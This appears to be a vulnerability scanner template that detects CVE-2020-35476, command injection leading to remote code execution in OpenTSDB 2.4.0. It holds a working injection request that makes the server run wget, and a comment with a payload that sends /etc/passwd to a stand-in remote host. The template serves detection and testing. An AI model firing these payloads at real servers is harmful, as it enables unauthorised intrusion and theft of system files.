id: CVE-2020-35476

info:
  name: OpenTSDB 2.4.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory.
  reference: https://github.com/OpenTSDB/opentsdb/issues/2051
  tags: cve,cve2020,opentsdb,rce

  # Extracting /etc/passwd to remote host:-
  # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2020-35476
    cwe-id: CWE-78

requests:
  - method: GET
    path:
      - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - plotted
          - timing
          - cachehit
        part: body
        condition: and

      - type: word
        words:
          - application/json
        part: header